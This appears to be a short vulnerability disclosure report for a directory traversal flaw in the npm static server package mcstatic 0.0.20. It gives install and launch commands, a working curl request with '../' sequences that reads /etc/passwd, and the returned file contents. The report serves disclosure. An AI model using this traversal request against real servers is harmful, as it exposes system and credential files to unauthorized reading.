I would like to report a Server Directory Traversal in mcstatic.
It allows reading local files on the target server.
module name: mcstatic
version: 0.0.20
npm page: https://www.npmjs.com/package/mcstatic
Static Http server for mocking and stuff
$ npm i mcstatic
$ ./node_modules/mcstatic/bin/mcstatic --port 6060
Read /etc/passwd on the target server:
$ curl --path-as-is 'http://127.0.0.1:6060/../../../../../../../../../etc/passwd'
##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
...
Impact: reading arbitrary local files on the target server.